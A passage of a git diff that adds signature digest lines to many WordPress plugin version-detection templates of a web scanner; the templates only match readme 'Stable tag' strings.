4b0a0048304602210092bbc6df1aa8bb3753f0cdcd0045eec9519a9806aa79dc64ca729d4d962842ca022100b0ce1682719eb1cf61a57d409a28f8c913fb241967d4ab3a21c6acbe89c4707e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..c1435d606a 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f00cdfa3e92fac3e6df768b889b225fe4d2eef247a6daa3ca454f3f63c0c287402201c5be29df00a6b4e2754483327399996de3f8ac50d42ea0d926d6bc97f09c1d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..962af57e49 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009ecdab7cd67490f71a9c1506be830526f75c764a0421d003e5b2b1512f65a7500220523d4d8bcd7ba7c359d5ec26c9b360f3164832ce0c22685b55daf7be5a64bfbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index f68ad2a6bf..9e84cd0d21 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201fee8dbf6fb051d90168b67b11cf2f7b29e99daa1b8bd9dc430da0a54ad4e48c022100f7634118574b37ed920a8b20d26dabe75abcb292a9c2ecb67571985084252add:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 196cc7e8e8..3e15b67a23 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022004f37cec0078ae3caa678f9a91939bc0b64be2519e7da4d8488aba2e4ed080ce022100d2a1ccdcce6a1f45c485499a6caad8aeaad8b7680d19cf22be0021b8c3be8c0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 55362630df..110db3c573 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e4d15e9f1ccb7be40cb92cf2fbc53752e8b113d675fc1566a90d33d582720e1e022100a0be0d749016f1d31010eeb058c0167e415788ac31c267348e7857760afec5e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..f65f8995a0 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b03e7e224c9d4b4972be36cdeb0e88d01da7c31b6cc7c3185c7be4f293c7407602210096cbac4033f8660856836110163baaf380ba50f9cedc81fdf3d909f23446ffde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..e8d6e3fbd3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210088bfcafb9b6e1fbcfb4b4196d567931c59020f7ac7fad05222aa9fe44234d5d502210081ca7bb1e524186a8777495690573f846300cb85fce5c8a93e0b886ac68b48eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..dca8c6aa69 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220390769ec4dd242409b00b3272ec624c17eef35ebed34db178d4613e83acc3a60022100957a36fe47335d6771fa81d5c093e3dc549a435ef6cef4ef4691f064b6ddba2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..8f84551ce0 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cb28e2e366a4d5de79f041902b339a62bc5920388d1a65a6e6d868edf743ef7a022100eba8a5472e918323c1f6bcf5ca19e995f094cb3e95995a0ccdb71e2d7cb22d59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..93b471a987 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b19338e1e3b31685e227bf8256fa5a89cfe987ba28a067e24f57c857f504769b022005fba5542bc0a16f049114e36888b769dcb61e526dc464428552473070a9ed12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index f76b750bf6..b351502a8a 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220782594ef892f7ad9c342aae4563116ba176c86d5cd29b22398d4b6277da9060102201aed06be340c98b81757d1b7ab60845a2d42b9f1551f5c490b70bab6407cdf8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..978d302027 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100beaa98ae8702bebfec684e8c9f11f141d882a85359cb2624aa083db96427554002202ec0bfa2253243aade9d3a76bae433a6c3b42249f3d89811e3c9e8c4ea37ff83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index d1e01c329b..7ae6d10950 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aaf14cfd177925c6a89811411bf3aac0fde90c7d0244dfde7fd173ff546f0906022006010472a74ed8b25e16f99496da7802e266a6f873b6b017968003af68f5dbb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..ac17d592b6 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220348e3839e99ef4b0a6fc47de04b9cb4a77aaf54c8cf672d68846c7b78f84ca020221008af216b380bc7c10e58e2a4e7d47c7edd920c2e3fce4ee8c70d7e618ee9090ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..173761b249 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cf8b3fd78e18a4a2a71670e207657dc198862336d3f4f20c942385d73135b57e02201918441cfa50a428af78e6ad44632f475eabb8f7a54a92e5022c639771a525e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..822df52638 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220239c74a220ab889e382bf42b34d10048eb1e4daed3127e27f4e43bb9d2098a4102210093784c76693bd3a025f578675ea4f794f876fddea4dd0d678a02e3f7d6d98a47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f3aae5f624..6ca6b5e7b8 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201ce566fe2a44f74fb51c48b47040ee42b8b3dad91074220b7188ee3a25448090022100f74c00a03a0958f9cea6b63c371f52277332326f20b420e0bc32ddf53f61d926:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..f0b3f79031 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201799d8a94ce22bf7cf99f3c8450c2e937be6f66192805e298532c94ee954210e02205ea5d3fca8b413839428608851fa515f7fd295c5a4b6afc8ee777458fa030060:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..44ea1dbcb9 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100954177c7c3ff00dc2b23016a6257df804e09a3475dd68a8b575f0ca7719a57e1022100d4bf7bb652d46078bef03e1a8ffe6aed770df0eef4f3dc2b21aca1c4a7409154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..d48ccb5699 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec9f14631751e9d7d9ca7016d4d6f5cfcb86e2ba1e04754049203ad0d635232a02200cb3b68c4f22bb27281b26cb7942878dc44510a4260e321ff88c6bb03711e044:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..2608dc3b38 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ddaf189c1da43d587a78ef34642bbbb1afb410bda97353493034cb20dbbd8247022021d416688db147f44a42e543e131cd892089d27d8bab99d05044d7ef53cbbd4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..61e4228427 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220242454e81bd078fa4a7aade778d7b643a3a0953066ea2ba1d93d829e127a919002201584938833053ec90971f3a43461382d7077f556bc7609cbc7b9448b5b72dde9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..fa3213d527 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d35d966444cac28205e2b659eb22cdb1fa35a5ba382db0920c14c6ca87e24b6c022100d31db9cc038df0f20fb5913bbfc048dc5c2fb2fce2a5740917f4b248f79053ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..7012a839ca 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a359be731109694fb8396d1ce1af85eda35039c15cd29e4c1b0a2b31af089ff802202ea676b63e3d16a739ab2c9f5a798a04cf3680c521c19c12978c0cb04226cf2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..1eef32a8ca 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203dcebe16e2ad3c63d66eadeaafdc1aba09dbe6df371808235fb1e98d0f6a38dc022100dbe03a4226fda70d38bd1d8aa521b83803cc016c297cb51d2793f5ae4f12a302:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..6ab1d1d333 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210096161e35c8ca14d93a86e1695a14fd8d3176388d643116191f5a05b0304952eb02204a4a269eab85fac2e61b31808afb4cba7f47b495453efd880245be36628867d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..e7367537b3 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100828ddb591c3fc1ca32d0b8042fc2a73f048e640133b64870b749d63bce06844702207896bf261b86a5a6be652bfaa3c2227569b69b4faa37a6460260cdc95d09f018:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cac90f45b2 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022070d8965f6af9f7b6a6209a11f434a548258ea11abd7138c2a5d79cee62426a8a022100f29cb111ac1540a3648015d2c01d38e724bde924099829948cc4407cbf52c5bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..5dc0243d21 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008efa2029f8471a308bf6a395969dc8a8d7ab832d74454dd7c5291a8c586a5169022100e4ccc98dacd702563c142c38c71f4043274d732b49da207e6698b60b5cb6084b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index d94b4228a9..f867ed6b50 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aa48d5a0bafa5448f6259b538d5a51497504fa25e06b7346782f63734bb3b4a4022051db3b69eb971479f8175d8ed008b42bf9ac086577edca6422c05cb7bd0414b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..9e68627f39 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205e05453626067604514439ce88ac841f11c29eccfb1a32d8e992b472e40c8dc50220158d12364917278c8ec698a019f95ac2b0ffa1abdee665103b419b0914d0aba4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 1b4769d0a7..b9deff38d8 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fbebdf973b7357c0a9385b0402ac504939cd11f95644d7c0168001b900b1fcc002204d3ed408c0f19f818f5999994704e11cc8497228d217e8b914b35915f5c4faff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index c2cd4ede1b..347a5026b8 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b2b7d97b5ca37851205d9ea837372dd733017d80c1ba0138b35563e7a5c90a8c02201e448682a8ed0eea911b12aa7acad061576cee34ada274b555e811c7790ac85d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 03e6c13ec5..ee7f9b01a3 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022077468a1cbab36d6dd4a98a237a7022088bf9ae0df7b5b2d40b9af309793be6c502205bed78e4182d1ccff6b736d40c8872822a21ad0a51729a98c28207ce7b9e983d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..63d68805aa 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b56594cc6447ce74e869f057de1c4c91d7a6274b66d584749cdb9f327f3aed63022100ea0a2176734c4cbb75464fd5bf31dd545d2d65b187ca609633fdecb295c35672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..9f5f57c014 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002c21eda5db51608d394ab1712f37bc7906e1cc2fb780dd21ca0deba79a420cc022100ed6ae9120af856c1bf05f11d6c4bcb0cb97e1897b98445cefc92b45ce0c713f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..aaf5a00e0c 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e41871db9ccd5c1326ed9019c39f2fb7b7840b474910cbc32b3b659a91e9a8f8022100eab6474e1b162ca814000f163c3414b63ef4d46c0279dcb07e3af188e60253d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..376e27259b 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220455a2fc2ea4ebc9b59db2fb4f18abcb5bb5b57e5b2280ccf0dabc8b4dcb017b602205ee87d2b1656f0ed6794e6c54665f1c2494dd83f9f477056888e983812436d74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..f7e09176b3 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210091ea1a91581ac8846426745a7686e83e151a5dfdcf3206edbdc714e3719ed56202201f5b039fe2a6e07762fd6d3f9fab969b538b1080cb359b839965fc164c370c7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..ff60f8f3f3 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ec322d72a46776edb188d61990fca5fc239303c6f32b5d4bf886529c93703334022100f1eff7de0274cc1f0eb62e65c5980f2d281af2171088b0430ccdfd12970a8ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..ef4acc6513 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022039d1c47ccbf7fd2bfb473fade58f18ace1b79e69d53677789a85d1aec12e70e202203a07798a204cd8685a7079b56dbafd1f9f366cbffaa41eb463d8f094023ffb44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index d74de07e8e..61edef5a6d 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220202a24d0a7f567ae82ddf5c9f3702476f00d0b16d12671c498475e4f55eb20d102204f5ff3b554dc4e99d6d85d1d78ffa88f60a9b862fd115addbbd810b6db86c2e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index e5cfe47925..8267425460 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022061ea3068f2d108c44d5411faa6f1162ab6750795b70abe6c5a282e513f940fed022100c00de8d5c1ff899529dcda775405b122756abec1890e6d9504c882ec2cf0952e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..86853ee94b 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d5a4cb9e71c85a0698726b4af8bfa3746f589732f8b9f2aa64d1d4d88b5eea210220165db6310ffdea8cb1e4cad5e86b3806a9994297d3e34e75caa599836add08d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..b930659d09 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d12c37a44e2cc085f4862eac8d594cccdfc4365136c72f7e1238530ae166d30b022100fdd5336729da1d12e7b279fd56586231961ec860cf2c7cabd32c182b73ec7c18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..4d66de3437 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ed888b1aa1f13d6afb907ed4f24f8834540776268a8b0b9ddb0fd8195dfd743a022100cf0ee11df0345cbbcadd7108750023aad8aa70848162ef8b8f6e5a8bee7970fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..b7840e19e9 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 